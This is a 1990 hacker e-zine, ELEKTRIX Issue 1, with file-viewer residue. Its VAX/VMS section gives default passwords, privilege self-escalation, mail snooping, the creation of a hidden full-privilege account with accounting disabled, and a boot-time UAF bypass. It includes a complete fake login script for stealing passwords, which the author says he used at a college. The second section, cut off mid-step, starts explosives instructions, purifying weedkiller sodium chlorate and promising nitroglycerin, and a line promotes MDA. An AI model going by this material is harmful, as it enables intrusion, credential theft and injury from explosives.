1929 lines
84 KiB
Plaintext
1929 lines
84 KiB
Plaintext
![]() |
----------------------------------------------------------------------------
|
|||
|
| |
|
|||
|
| The Supreme Seven [S7] proudly present... |
|
|||
|
| |
|
|||
|
| ELEKTRIX Issue 1 |
|
|||
|
| |
|
|||
|
| Released May 1990 - Issue 2 in July |
|
|||
|
| |
|
|||
|
| |
|
|||
|
| HACKING * PHREAKING * ANARCHY * ELECTRONIC SURVEILLANCE AND PYROTECHNICS |
|
|||
|
| |
|
|||
|
| |
|
|||
|
| You can contact us at Palm Beach BBS ++44(303)-265979 [Email to Deceptor] |
|
|||
|
----------------------------------------------------------------------------
|
|||
|
|
|||
|
Disclaimer: In no event shall Palm Beach be liable to anyone for special,
|
|||
|
collateral, incidental, or consequential damages in connection with or
|
|||
|
arising out of the use of the information within this magazine and sole
|
|||
|
and exclusive liability to Palm Beach, regardless of any form of action,
|
|||
|
shall not exceed the purchase price of this magazine (which since it is
|
|||
|
nothing means we don't owe u nowt!). Moreover, Palm Beach shall not be
|
|||
|
liable for any claim of any kind whatsoever against the user of these text
|
|||
|
materials by any other party. Palm Beach makes no warranty, either exp-
|
|||
|
ressed or implied, including but not limited to any implied warranties of
|
|||
|
merchantability and fitness for particular purpose, regarding these text
|
|||
|
materials and makes such materials available solely on an 'as-is' basis.
|
|||
|
Now that that's over with - PARTY!
|
|||
|
|
|||
|
Well now, this is the first issue of many ELEKTRIX newsletters covering
|
|||
|
such topics as COMPUTER SECURITY, HACKING, PHREAKING, SAT DECODING, RTTY
|
|||
|
ENCODED CRACKING, MAG.STRIP ENCRYPTION AND SUPPLIES, THE ANARCHISTS GUIDES,
|
|||
|
PYROTECHNICS, ELECTRONIC SURVEILLANCE AND ELECTRONIC FRAUD.
|
|||
|
In this issue there are articles on Hacking, Phreaking, Pyrotechnics,
|
|||
|
anarchy and electronic surveillance. The newsletter is bi-monthly and so
|
|||
|
the next issue will be out in July. You can 'pickup' a copy of ELEKTRIX at
|
|||
|
any of these boards around the world:
|
|||
|
|
|||
|
HACKERNET (UK) ++44(532)-557739
|
|||
|
PALM BEACH BB (UK) ++44(303)-265979
|
|||
|
THE LIMELIGHT BBS (USA) 0101-203-834-0367
|
|||
|
THE PIRATES HAVEN + THE WAREHOUSE BB (EUROPE)
|
|||
|
|
|||
|
If you have an article or some information which you would like to see
|
|||
|
put to use in the next issue then you can contact us at Palm Beach BBS UK.
|
|||
|
Please send all e-mail to Deceptor. Higher priviledges available to hackers
|
|||
|
, phreakers, etc. You can contact S7 at these places too:
|
|||
|
|
|||
|
TCHH - Maxhack/Deceptor/Pop
|
|||
|
QSD - Alex/Maxhack/Deceptor
|
|||
|
GHOST - Mail to S7/Deceptor
|
|||
|
|
|||
|
|
|||
|
<20> Part 1 - Hacking VMS - UAF / False Logon programs, etc. / Pling Wiz
|
|||
|
|
|||
|
<20> Part 2 - The Anarchists guide to...pyrotechnics & mischief / Deceptor
|
|||
|
|
|||
|
<20> Part 3 - An guide to modern electronic surveillance / Technic
|
|||
|
|
|||
|
<20> Part 4 - Make your own tonepad for phone box phreaking / Maxhack
|
|||
|
|
|||
|
<20> Part 5 - Freefone interrogation.....The ultimate in lists. / Agent 7
|
|||
|
|
|||
|
|
|||
|
---------------------- ELEKTRIX ISSUE 1: MAY 1990 ---------------------------
|
|||
|
|
|||
|
|
|||
|
----------------------------------------------------------------------------
|
|||
|
| |
|
|||
|
| ELEKTRIX Issue 1 - Part 1 |
|
|||
|
| ~~~~~~~~~~~~~~~~~~~~~~~~~ |
|
|||
|
| |
|
|||
|
| Hacking VAX/VMS + The User Authorisation File |
|
|||
|
| By Pling Wiz |
|
|||
|
| |
|
|||
|
| PALM BEACH BBS UK ++44(303)-265979 |
|
|||
|
| |
|
|||
|
----------------------------------------------------------------------------
|
|||
|
|
|||
|
|
|||
|
|
|||
|
INTRODUCTION
|
|||
|
|
|||
|
The VAX is made by DEC (Digital Equipment Corp) and can run a variety
|
|||
|
of operating systems. In this file i will talk about the VMS (Virtual
|
|||
|
Memory Operating System), VMS also runs on the PDP-11, both mainframes
|
|||
|
are 32 bit machines with 32 bit virtual address space.
|
|||
|
|
|||
|
ENTRANCE:
|
|||
|
|
|||
|
When you first connect to a VAX you type either a return, a ctrl-c or
|
|||
|
a ctrl-y. It will then respond with something similar to this:
|
|||
|
|
|||
|
USERNAME:
|
|||
|
PASSWORD:
|
|||
|
|
|||
|
The most frequent way of gaining access to a computer is by using a
|
|||
|
'default' password, this by the way is not very successful.......
|
|||
|
When DEC sells a VAX/VMS, the system comes equipped with 4 accounts
|
|||
|
which are:
|
|||
|
|
|||
|
DEFAULT : This serves as a template in creating user records in the
|
|||
|
UAF (User Authorization File). A new user record is assigned
|
|||
|
the values of the default record except where the system
|
|||
|
manager changes those values. The default record can be
|
|||
|
modified but can not be deleted from the UAF.....
|
|||
|
|
|||
|
SYSTEM : Provides a means for the system manager to log in with full
|
|||
|
privileges. The SYSTEM record can be modified but cannot be
|
|||
|
deleted from the UAF.......
|
|||
|
|
|||
|
FIELD : Permits DIGITAL field service personnel to check out a new
|
|||
|
system. The FIELD record can be deleted once the system is
|
|||
|
installed.
|
|||
|
|
|||
|
SYSTEST: Provides an appropriate environment for running the User
|
|||
|
Environment Test Package (UETP). The SYSTEST record can be
|
|||
|
deleted once the system is installed.
|
|||
|
|
|||
|
Usually the SYSTEM MANAGER adds,deletes, and modifies these records
|
|||
|
which are in the UAF when the system arrives, thus eliminating the
|
|||
|
default passwords, but this is not always the case.....
|
|||
|
some default passwords which have been used to get in a system are....
|
|||
|
|
|||
|
USERNAME PASSWORD
|
|||
|
|
|||
|
SYSTEM MANAGER or OPERATOR
|
|||
|
FIELD SERVICE or TEST
|
|||
|
DEFAULT USER or DEFAULT
|
|||
|
SYSTEST UETP or SYSTEST
|
|||
|
|
|||
|
Other typical VMS accounts are :
|
|||
|
VAX
|
|||
|
VMS
|
|||
|
DCL
|
|||
|
DEMO
|
|||
|
GUEST
|
|||
|
GENERAL
|
|||
|
TEST
|
|||
|
HELP
|
|||
|
GAMES
|
|||
|
DECNET
|
|||
|
|
|||
|
Or a combination of the various usernames and passwords. If none of
|
|||
|
these get you in , then you should try another system unless you have
|
|||
|
away of getting an account either by trashing or other means.....
|
|||
|
|
|||
|
YOUR IN!!!!!!
|
|||
|
|
|||
|
You will know that you are in by receiving the prompt of a dollar sign
|
|||
|
($). You will be popped into the default directory which is dependent
|
|||
|
on what account you logged in as. If you get in as system manager
|
|||
|
(highly unlikely) you have full access....
|
|||
|
If you get the FIELD or SYSTEST account , you may or may not have full
|
|||
|
access, but you may have the privileges to give your self full access.
|
|||
|
|
|||
|
To give privs to yourself:
|
|||
|
|
|||
|
$ SET PROCESS/PRIVS=ALL
|
|||
|
|
|||
|
The VMS system has full help files available by typing HELP. You can
|
|||
|
use the wildcard character of an '*' to list out info on every
|
|||
|
command:
|
|||
|
$ help *
|
|||
|
|
|||
|
When you first logon, it may be to your advantage to get a list of all
|
|||
|
users currently logged onto the system if there are any at all. You
|
|||
|
can do this by:
|
|||
|
|
|||
|
$ SHOW USERS
|
|||
|
|
|||
|
VAX/VMS Interactive Users-Total=4
|
|||
|
01-may-1989 11:37:21.73
|
|||
|
0PAO: DEMO 004C004C
|
|||
|
TTD2: FIELD 004E02FF
|
|||
|
TTD1: SYSMAN 0043552E
|
|||
|
TXB3 TRTRTRRTR 01190057
|
|||
|
|
|||
|
It is highly recommended that if you are logged on in the day and
|
|||
|
there are people logged in, especially the system manager or the
|
|||
|
account you are logged on as appears twice.. log out straight away,
|
|||
|
and call back later. You do not want to call to late though as the
|
|||
|
system keeps a record of when each user logs in and out.
|
|||
|
|
|||
|
To communicate with other users or other hackers that are on the
|
|||
|
system, use the PHONE utility..
|
|||
|
|
|||
|
$ PHONE Username
|
|||
|
|
|||
|
If the system has DEC-NET you can see what available nodes there are
|
|||
|
by :
|
|||
|
|
|||
|
$ SHOW NETWORK
|
|||
|
|
|||
|
If you have mail the system will tell you as soon as you logon, simply
|
|||
|
type:
|
|||
|
|
|||
|
$ MAIL
|
|||
|
|
|||
|
This will invoke the Personal Mail Utility, you can then either read
|
|||
|
your mail or select help....
|
|||
|
|
|||
|
DIRECTORIES:
|
|||
|
To see what you have in your directory type:
|
|||
|
|
|||
|
$ DIR
|
|||
|
|
|||
|
To get a list of directories on the system type:
|
|||
|
|
|||
|
$ DIR *.*
|
|||
|
|
|||
|
When a VAX/VMS is first installed, it comes with 9 directories which
|
|||
|
are not listed when you execute the DIR *.* command:
|
|||
|
|
|||
|
<SYSLIB>
|
|||
|
This directory contains various macro and object libraries.
|
|||
|
|
|||
|
<SYSMSG>
|
|||
|
This directory contains files used in managing the operating system.
|
|||
|
|
|||
|
<SYSMGR>
|
|||
|
This directory contains text files and help libraries for the HELP
|
|||
|
library.
|
|||
|
|
|||
|
<SYSERR>
|
|||
|
This is the directory for the error log file (ERRLOG.SYS).
|
|||
|
|
|||
|
<SYSTEST>
|
|||
|
This directory contains files used in testing the functions of the
|
|||
|
operating system.
|
|||
|
|
|||
|
<SYSMAINT>
|
|||
|
This directory contains system diagnostic programs.
|
|||
|
|
|||
|
<SYSUPD>
|
|||
|
This directory contains filesused in applying system updates.
|
|||
|
|
|||
|
<SYSUPD.EXAMPLES>
|
|||
|
This directory contains sample driver programs, user-written system
|
|||
|
services, and other source programs.
|
|||
|
|
|||
|
<SYSEXE>
|
|||
|
This directory contains the executable images of most of the functions
|
|||
|
of the operating system.
|
|||
|
Inside these directoriesare files with the following file types:
|
|||
|
|
|||
|
File-Type: Description: command:
|
|||
|
--------------------------------------------------------------------
|
|||
|
.hlp system help file TYPE filename
|
|||
|
.dat data file TYPE filename
|
|||
|
.msg message file TYPE filename
|
|||
|
.doc Documentation TYPE filename
|
|||
|
.log LOG file TYPE filename
|
|||
|
.err ERROR msg file TYPE filename
|
|||
|
.seq sequential file TYPE filename
|
|||
|
.sys system file FILE-NAME
|
|||
|
.exe executable file FILE-NAME
|
|||
|
.com command file COMMAND NAME
|
|||
|
.bas basic file RUN file-name
|
|||
|
.txt ascii text file TYPE filename
|
|||
|
--------------------------------------------------------------------
|
|||
|
There are others but you won't see them as much as the above. You can
|
|||
|
change the directories either by using the CHANGE command or by using
|
|||
|
the SET DEFAULT command:
|
|||
|
|
|||
|
$ CHANGE <DIR.NAM>
|
|||
|
or
|
|||
|
$ SET DEFAULT <DIR.NAM>
|
|||
|
|
|||
|
You can now list and execute the files in this directory without first
|
|||
|
the directory name followed by the filename as long as you have
|
|||
|
sufficient access. If you don't have sufficient access you can still
|
|||
|
view files within directories that you cannot default to by:
|
|||
|
|
|||
|
$ TYPE <LOD.DIR> LOD.MAI;1
|
|||
|
This will list the contents of the file LOD.MAI;1 in the directory of
|
|||
|
<LOD.DIR>
|
|||
|
|
|||
|
The use of wildcards is very helpful when you desire to view all the
|
|||
|
mail or something on the system. To list out all the users mail if you
|
|||
|
have access type:
|
|||
|
|
|||
|
$TYPE <*.*>*.MAI;*
|
|||
|
|
|||
|
As you may have noticed mail files have the extension of MAI at the
|
|||
|
end. The ;1 or ;2 etc are used to number files with the same name.
|
|||
|
|
|||
|
PRIVILEGES
|
|||
|
|
|||
|
Privileges fall into 7 categories according to the damage that the
|
|||
|
user possessing them could cause to the system:
|
|||
|
|
|||
|
NONE - No privileges
|
|||
|
|
|||
|
NORMAL - minimum privileges to use the system.
|
|||
|
|
|||
|
GROUP - Potential to interfere with members of the same group.
|
|||
|
|
|||
|
DEVOUR - Potential to devour noncritical system-wide resources.
|
|||
|
|
|||
|
SYSTEM - Potential to interfere with normal system operation.
|
|||
|
|
|||
|
FILE - Potential to comprimise file security.
|
|||
|
|
|||
|
ALL - Potential to control the system (wouldn't that be good ahah).
|
|||
|
|
|||
|
THE UAF
|
|||
|
|
|||
|
The User Authorization File contains the names of the users who may
|
|||
|
log into the system and also contains a record of the users
|
|||
|
privileges. Each record in the UAF includes the following:
|
|||
|
|
|||
|
1. Name and Password.
|
|||
|
2. User Identification Code(UIC)-- Identifies a user by a group number
|
|||
|
and a member number.
|
|||
|
3. Default file specification --- Has the default device and directory
|
|||
|
names for file access.
|
|||
|
4. Login command file --- Names a command procedure to be executed
|
|||
|
automatically at login time.
|
|||
|
5. Login flags --- Allows the system manager to inhibit the user of
|
|||
|
the ctrl-y functions and lock user passwords.
|
|||
|
6. Priority ---- Specifies the base priority of the process created
|
|||
|
by the user at login time.
|
|||
|
7. Resources --- Limits the system resources the user may perform.
|
|||
|
8. Privileges --- Limits the activities the user may perform.
|
|||
|
|
|||
|
If you have SYSTEM MANAGER privileges, you will be able to add,delete,
|
|||
|
and modify records in the UAF.
|
|||
|
|
|||
|
The AUTHORIZE Utility allows you to modify the information in the UAF.
|
|||
|
It is usually found in the SYSEXE directory.
|
|||
|
The commands for AUTHORIZE are:
|
|||
|
ADD Username <qualifier..> Adds a record to the UAF.
|
|||
|
EXIT (or CTRL-Z) Returns you to command level.
|
|||
|
HELP Lists the AUTHORIZE commands.
|
|||
|
LIST <Userspec></FULL> Creates a listing file of UAF records.
|
|||
|
MODIFY Username Modifies a record.
|
|||
|
REMOVE Username deletes a record.
|
|||
|
SHOW Displays UAF records.
|
|||
|
|
|||
|
The most useful besides ADD is the SHOW command. SHOW displays reports
|
|||
|
for selected UAF records. YOU can get a /BRIEF listing of a /FULL
|
|||
|
listing. BUT before you do that, you may want to make sure no one is
|
|||
|
logged on besides you,to make sure know one can log on type the
|
|||
|
following:
|
|||
|
|
|||
|
$ SET LOGINS /INTERACTIVE=0
|
|||
|
|
|||
|
This establishes the max number of users able to log in to the system,
|
|||
|
this command does not affect users currently logged on.
|
|||
|
|
|||
|
To list out the userfile do the following:
|
|||
|
|
|||
|
$ SET DEFAULT <SYSEXE>
|
|||
|
$ RUN AUTHORIZE
|
|||
|
UAF> SHOW * /BRIEF
|
|||
|
|
|||
|
UAF
|
|||
|
Unfortunately you cannot get a listing of passwords,though you can get
|
|||
|
a listing of all the users as shown above... The passwords are
|
|||
|
encrypted just like the unix systems.
|
|||
|
If you have sufficient privs you can create your own account.........
|
|||
|
|
|||
|
UAF> ADD <Username> /PASSWORD=HACKER /UIC=<014,006> /CPUTIME=0
|
|||
|
/DEVICE=SYS$ROOT_/ACCOUNT=VMS /DIRECTORY=<SYSERR> /PRIVS=ALL
|
|||
|
/OWNER=DIGITAL /NOACCOUNTING
|
|||
|
|
|||
|
1. ADD USERNAME
|
|||
|
2. SPECIFY THE PASSWORD YOU WANT TO USE....
|
|||
|
3. ASSIGN A UIC CONSISTS OF 2 NUMBERS FROM 0 TO 377 SEPERATED BY A
|
|||
|
COMMAND ENCLOSED IN BRACKETS....
|
|||
|
4. CPUTIME IS IN DELTA FORMAT, 0 MEANS INFINITE......
|
|||
|
5. SPECIFY THE DEVICE THAT IS ALLOCATED TO THE USER WHEN THEY LOGIN.
|
|||
|
OTHER DEVICES ARE SYS$DEVICE,SYS$SYSDISK ETC..
|
|||
|
6. SPECIFYING AN ACCOUNT IS NOT REALLY NECCESSARY
|
|||
|
7. PRIVS YOU ARE GOING TO WANT ALL THE PRIVS AREN'T YOU???
|
|||
|
8. VERY IMPORTANT.... NOACCOUNTING WILL DISABLE THE SYSTEM ACCOUNTING
|
|||
|
RECORDS,THUS NOT ADDING INFORMATION TO THE ACCOUNTING.DAT FILE.
|
|||
|
|
|||
|
|
|||
|
LOGGING OFF
|
|||
|
Simply type:
|
|||
|
$ LOGOUT
|
|||
|
|
|||
|
|
|||
|
BYPASSING THE UAF...
|
|||
|
=====================
|
|||
|
|
|||
|
|
|||
|
The preferred method of breaking into a locked system is to set the alternat
|
|||
|
UAF. This method requires setting the system parameter UAFALTERNATE, which
|
|||
|
defines the logical name SYSUAF to refer to the file SYS$SYSTEM:SYSUAFALT.DA
|
|||
|
If this file is found during a normal login, the system uses it to validate
|
|||
|
the account and prompts you for the username and password.
|
|||
|
If this file is not located, the system assumes that the UAF is corrupt and
|
|||
|
accepts any username and password to log you into the system from the system
|
|||
|
console. Logins are prohibited from all other locations.
|
|||
|
|
|||
|
NOTE: You can only use this method to log into the system from the console
|
|||
|
terminal; you cannot use the other terminal lines.
|
|||
|
|
|||
|
To set the alternate UAF ,use the following procedure:
|
|||
|
|
|||
|
1: Perform a conversational boot..
|
|||
|
2: When the SYSBOOT > prompt appears, enter the following
|
|||
|
SYSBOOT > SET UAFALTERNATE 1 <cr>
|
|||
|
3: Type CONTINUE and press <cr>
|
|||
|
4: When the start up procedure completes, log in on the console terminal by
|
|||
|
entering any username and password when asked to..
|
|||
|
|
|||
|
The system assigns the following values to your user account:
|
|||
|
|
|||
|
NAME.................. Username.
|
|||
|
UIC................... [001,004].
|
|||
|
COMMAND INTERPRETER... DCL.
|
|||
|
LOGIN FLAGS........... None.
|
|||
|
PRIORITY.............. Value of system parameter (DEFPRI).
|
|||
|
RESOURCES............. Value of the PQL system parameters.
|
|||
|
PRIVILEGES............ ALL.
|
|||
|
|
|||
|
The process name is usually the name of the device on which you logged in
|
|||
|
EG opa0..
|
|||
|
|
|||
|
5: Fix the problem that caused you to be locked out of the system. That is,
|
|||
|
make the necessary repairs to the UAF or to the start up or login
|
|||
|
procedures . (If you modify a login or startup procedure and the problem
|
|||
|
is still not solved, restore procedure to its previous state.
|
|||
|
|
|||
|
If the problem is a forgotten password, reset the UAFALTERNATE system param
|
|||
|
to 0, as explained in the next step. Then enter the authorize utility and
|
|||
|
then type HELP MODIFY for info on modifying passwords...
|
|||
|
|
|||
|
6: Clear the UAFALTERNATE parameter by running SYSGEN and using SYSGEN
|
|||
|
commands. To run SYSGEN, enter the following commands at the DCL prompt:
|
|||
|
|
|||
|
$ RUN SYS$SYSTEM:SYSGEN <CR>
|
|||
|
|
|||
|
The SYSGEN prompt is then displayed, then enter the following commands:
|
|||
|
|
|||
|
SYSGEN > SET UAFALTERNATE 0 <CR>
|
|||
|
SYSGEN > WRITE CURRENT <CR>
|
|||
|
SYSGEN > EXIT <CR>
|
|||
|
|
|||
|
7: Shutdown and reboot the system.
|
|||
|
|
|||
|
Emergency startup after modifying system paramaters.
|
|||
|
|
|||
|
In some cases, modifying system parameters may cause the system to become
|
|||
|
unbootable. If this occurs, use the following emergency startup procedure
|
|||
|
to restore normal operation.....
|
|||
|
|
|||
|
1: Perform a conversational boot....
|
|||
|
2: When the SYSBOOT > prompt appears enter the following commands:
|
|||
|
SYSBOOT > USE DEFAULT.PAR <CR>
|
|||
|
SYSBOOT > CONTINUE <CR>
|
|||
|
3: When the system finishes booting, review any changes you made to SYSGEN
|
|||
|
parameters, modify MODPARAMS.DAT as necessary and re execute AUTOGEN.
|
|||
|
|
|||
|
|
|||
|
BYPASSING STARTUP AND LOGIN
|
|||
|
===========================
|
|||
|
|
|||
|
If the system does not complete the startup procedures or does not allow you
|
|||
|
to log in , bypass the startup and login procedures by following these steps
|
|||
|
|
|||
|
1: Perform a conversational boot..
|
|||
|
2: define the console to be the startup procedure by entering the following
|
|||
|
commands at the SYSBOOT > prompt:
|
|||
|
SYSBOOT > SET/STARTUP OPA0:
|
|||
|
Type continue and press <CR> in response to the next SYSBOOT > prompt.
|
|||
|
Wait for the DCL prompt to return.....
|
|||
|
3: Correct the error condition that caused the login failure. That is, make
|
|||
|
the necessary repairs to the startup or login procedures, or to the UAF.
|
|||
|
You may want to enter the following DCL commands because bypassing the
|
|||
|
startup procedures leaves the system in a partially initialized state:
|
|||
|
|
|||
|
$ SET NOON <CR>
|
|||
|
$ SET DEFAULT SYS$SYSROOT:[SYSEXE] <CR>
|
|||
|
|
|||
|
Invoke a text editor to correct the startup or login procedure file. Note
|
|||
|
that some system consoles may not supply a screen mode editor.
|
|||
|
|
|||
|
4: Reset the startup procedure by invoking SYSGEN and entering the following
|
|||
|
commands:
|
|||
|
|
|||
|
$ RUN SYS$SYSTEM:SYSGEN <CR>
|
|||
|
SYSGEN > SET/STARTUP SYS$SYSTEM:STARTUP.COM <CR>
|
|||
|
SYSGEN > WRITE CURRENT <CR>
|
|||
|
SYSGEN > EXIT <CR>
|
|||
|
|
|||
|
5: Perform a normal startup by entering the following command:
|
|||
|
|
|||
|
$ @SYS$SYSTEM:STARTUP <CR>
|
|||
|
|
|||
|
To perform an orderly shutdown of the system, invoke SHUTDOWN.COM from
|
|||
|
any terminal and any priveleged account with the following DCL command:
|
|||
|
|
|||
|
$ @SYS$SYSTEM:SHUTDOWN <CR>
|
|||
|
|
|||
|
|
|||
|
EMERGENCY SHUTDOWN WITH OPCRASH
|
|||
|
===============================
|
|||
|
|
|||
|
This describes how to halt the system immediately without performing any of
|
|||
|
the functions that ensure an orderly shutdown. You use the OPCRASH procedur
|
|||
|
only if SHUTDOWN.COM FAILS......
|
|||
|
|
|||
|
To perform this procedure you must have CMKRNL privilege. You can enter the
|
|||
|
commands from ANY terminal.
|
|||
|
|
|||
|
1: Enter the following command to force an immediate shutdown of the system
|
|||
|
|
|||
|
$ RUN SYS$SYSTEM:OPCRASH <CR>
|
|||
|
|
|||
|
2: At the system console the following message is displayed
|
|||
|
SYSTEM SHUTDOWN COMPLETE - USE COBSOLE TO HALT SYSTEM.
|
|||
|
|
|||
|
3: Halt the system
|
|||
|
e.g. emergency shutdown using opcrash...
|
|||
|
|
|||
|
$ RUN SYS$SYSTEM:OPCRASH <CR>
|
|||
|
|
|||
|
GENERAL MAINTENANCE OF THE UAF.
|
|||
|
===============================
|
|||
|
|
|||
|
To disable an account use the following command:
|
|||
|
|
|||
|
UAF > MODIFY USERNAME/FLAGS=DISUSER <CR>
|
|||
|
|
|||
|
The login flag disuser disables the account and prevents anyone from loggin
|
|||
|
into the account.
|
|||
|
To enable the account when it is needed, run AUTHORIZE and specify the
|
|||
|
following command:
|
|||
|
|
|||
|
UAF > MODIFY USERNAME/FLAGS=NODISUSER <CR>
|
|||
|
|
|||
|
|
|||
|
MODIFYING A USER ACCOUNT.
|
|||
|
=========================
|
|||
|
|
|||
|
Use the AUTHORIZE command MODIFY to change any of the fields in an existing
|
|||
|
user account. The following command is used to change a users password.
|
|||
|
|
|||
|
UAF> MODIFY USERNAME/PASSWORD=NEWPASSWORD <CR>
|
|||
|
|
|||
|
|
|||
|
LISTING USER ACCOUNTS.
|
|||
|
======================
|
|||
|
|
|||
|
Use the AUTHORIZE command LIST to create the file SYSUAF.LIS containing a
|
|||
|
summary of all user records in the UAF, as follows:
|
|||
|
|
|||
|
UAF > LIST <CR>
|
|||
|
|
|||
|
%UAF-I-LSTMSG1, WRITING LISTING FILE
|
|||
|
%UAF-I-LSTMSG2, LISTING FILE SYSUAF.LIS COMPLETE.
|
|||
|
|
|||
|
By default the LIST command produces a brief report containing the followin
|
|||
|
info from the UAF:
|
|||
|
|
|||
|
ACCOUNT OWNER,USERNAME,UIC,ACCOUNTNAMES,PRIVILEGES,PROCESS PRIORITY,
|
|||
|
DEFAULT DISK AND DIRECTORY.
|
|||
|
|
|||
|
Use the /FULL qualifier to create a full report of all the info contained
|
|||
|
within the UAF.....
|
|||
|
|
|||
|
|
|||
|
ENABLING SECURITY ALARMS.
|
|||
|
=========================
|
|||
|
|
|||
|
To enable security auditing, specify the dcl command SET AUDIT in the
|
|||
|
following format:
|
|||
|
|
|||
|
$ SET AUDIT/ALARM/ENABLE = KEYWORD [...]
|
|||
|
|
|||
|
Select the events to be audited by specifying one or more of the keywords
|
|||
|
to the /ENABLE qualifier....
|
|||
|
|
|||
|
ACL.......... Event requested by an acl on a file or global section..
|
|||
|
ALL.......... All possible events..
|
|||
|
AUDIT........ Execution of the SET AUDIT command..
|
|||
|
AUTHORIZATION modifications to the system UAF file, network proxy,
|
|||
|
authorization file,rights database, or changes to system
|
|||
|
and user passwords..
|
|||
|
BREAKIN...... Successful breakin attempt..
|
|||
|
FILE ACCESS.. Selected types of access (privileged + non privileged) to
|
|||
|
files + global sections..
|
|||
|
INSTALL...... Installation of images..
|
|||
|
LOG FAILURE.. Failed login attempt..
|
|||
|
LOGIN........ Successful login attempt..
|
|||
|
MOUNT........ Volume mounts + dismounts..
|
|||
|
|
|||
|
|
|||
|
ENABLING ALARM MESSAGES
|
|||
|
=======================
|
|||
|
|
|||
|
After you enable a security operator terminal, enable specific alarm events
|
|||
|
with the SET AUDIT/ENABLE qualifier. Alarm messages are then sent to the
|
|||
|
security operator terminal when the selected events occur.
|
|||
|
|
|||
|
|
|||
|
AUDIT REDUCTION FACILITY.
|
|||
|
=========================
|
|||
|
|
|||
|
If you have enabled security alarms, the operating system writes the
|
|||
|
information about these alarms to the security operators log file. To
|
|||
|
extract all of the security alarm info from the current operators log file
|
|||
|
(SYS$MANAGER:OPERATOR.LOG) execute this command:
|
|||
|
|
|||
|
$ @SYS$MANAGER:SECAUDIT <CR>
|
|||
|
|
|||
|
Output from SECAUDIT is displayed on SYS$OUTPUT. If you want to write the
|
|||
|
records to a file, include the file spec with the /OUTPUT qualifier..
|
|||
|
The following command writes the records to the file BREAKINS.DAT in the
|
|||
|
user current directory..
|
|||
|
|
|||
|
|
|||
|
$ @SYS$MANAGER:SECAUDIT/OUTPUT=BREAKINS.DAT
|
|||
|
|
|||
|
|
|||
|
SIMPLE DECOY PROGRAM
|
|||
|
~~~~~~~~~~~~~~~~~~~~
|
|||
|
|
|||
|
This is a decoy program that runs on the vax/vms system..
|
|||
|
It does work because i have used it at the local college of FE, to steal
|
|||
|
passwords and accounts whilst working there....
|
|||
|
|
|||
|
The program now follows:-
|
|||
|
|
|||
|
$ clear
|
|||
|
$ set term/noecho/notype
|
|||
|
$ SYSNAM:=(nodename)
|
|||
|
$begin:
|
|||
|
$ read/error=begin/prompt="" sys$command ret
|
|||
|
$ write sys$output ""
|
|||
|
$ID:
|
|||
|
$ wait 00:00:00.5
|
|||
|
$ write sys$output "*** ''SYSNAM' VAX/VMS SYSTEM ***"
|
|||
|
$ write sys$output ""
|
|||
|
$ write sys$output ""
|
|||
|
$ wait 00:00:01
|
|||
|
$ set term/echo
|
|||
|
$ askquest:
|
|||
|
$ read/error=fail/end=eof/prompt="USERNAME: "/time=20 sys$command quest
|
|||
|
$ if f$edit(quest,"upcase") .eqs. "SYBIL" then SYSNAM:=SYBIL
|
|||
|
$ if f$edit(quest,"upcase") .eqs. "SYBIL" then goto ID
|
|||
|
$ if quest .nes. "" then goto askpass
|
|||
|
$eof:
|
|||
|
$ write sys$output "Error reading command input"
|
|||
|
$ write sys$output "End of file detected"
|
|||
|
$ goto begin
|
|||
|
$fail:
|
|||
|
$ write sys$output "Error reading command input"
|
|||
|
$ write sys$output "Timeout period expired"
|
|||
|
$ goto begin
|
|||
|
$askpass:
|
|||
|
$ set term/noecho
|
|||
|
$ read/error=eof/end=eof/prompt="PASSWORD: " sys$command pass
|
|||
|
$ set term/echo
|
|||
|
$ open/write file data.dat
|
|||
|
$ write file quest
|
|||
|
$ write file pass
|
|||
|
$ write file f$time()
|
|||
|
$ close file
|
|||
|
$ set term/lowercase
|
|||
|
$ write sys$output "User authorization failure"
|
|||
|
$ read/error=begin/prompt ="" sys$command ret
|
|||
|
$ stop/id='f$getjpi("","PID")
|
|||
|
|
|||
|
Notes about use...
|
|||
|
|
|||
|
1... change the welcoming message of the program to what is actually seen
|
|||
|
on your vax...
|
|||
|
|
|||
|
2... why not put at the top of the program the logout procedure of someone
|
|||
|
else.. because a blank screen looks a bit suspicious...
|
|||
|
just copy the log out statement and put it between a sys$output command
|
|||
|
in the program .. not forgetiing to take the clear command out haha
|
|||
|
|
|||
|
|
|||
|
------------------- Palm Beach BBS ++44(303)-265979 ------------------------
|
|||
|
|
|||
|
----------------------------------------------------------------------------
|
|||
|
| |
|
|||
|
| ELEKTRIX Issue 1 - Part 2 |
|
|||
|
| ~~~~~~~~~~~~~~~~~~~~~~~~~ |
|
|||
|
| |
|
|||
|
| The Anarchists guide to...Pyrotechnic mischief |
|
|||
|
| by Deceptor |
|
|||
|
| |
|
|||
|
| PALM BEACH BB UK ++44(303)-265979 |
|
|||
|
| |
|
|||
|
----------------------------------------------------------------------------
|
|||
|
|
|||
|
MDA - (3-4-methylendioxyphenylisopropylamine) takes u higher!
|
|||
|
|
|||
|
|
|||
|
Welcome to this, Issue 1 of Elektrix, and with it Part 1 of the 'anarchists
|
|||
|
guide to...' This first file will contain basic information on pyrotechnics
|
|||
|
and other 'bits n pieces' useful for a good laugh.
|
|||
|
|
|||
|
In this file you will find information on how to make the following:
|
|||
|
|
|||
|
Fuse Paper
|
|||
|
Auto-Firelighters
|
|||
|
Low-explosive: Gunpowder
|
|||
|
Hi-explosive : Nitro-Glycerin
|
|||
|
Hot Stuff
|
|||
|
|
|||
|
|
|||
|
FUSE PAPER
|
|||
|
|
|||
|
Useful for making the fuses for bangers (firecrackers) and other slow-burn
|
|||
|
fuse applications.
|
|||
|
|
|||
|
You will need: Sodium Chlorate - Go to your local gardenshop/centre and ask
|
|||
|
for some Sodium Chlorate weedkiller. You're
|
|||
|
meant to be 18 by law but if you're not it
|
|||
|
doesn't usually stop them selling you it.
|
|||
|
|
|||
|
Newspaper/Tracing Paper
|
|||
|
|
|||
|
The Sodium Chlorate in the weedkiller is unlikely to be more than about 65%
|
|||
|
pure - this is not a problem if you're not worried about how quickly it will
|
|||
|
burn as fuse paper but if you are using the fuses in a lot of wind or are
|
|||
|
going to through them as part of a firecracker you will have to concentrate
|
|||
|
the Sodium Chlorate and remove impurities as much as possible beforehand as
|
|||
|
follows:
|
|||
|
|
|||
|
Make a saturated solution of the weedkiller (ie.dissolve as much of it
|
|||
|
as you can in very hot water) then filter off any remaining crystals.
|
|||
|
Then heat the solution very hot in a dish - then when crystals start
|
|||
|
forming around the rim heat more gently and then leave to cool - after
|
|||
|
some time u will have crystals with gunge all over them - wash them and
|
|||
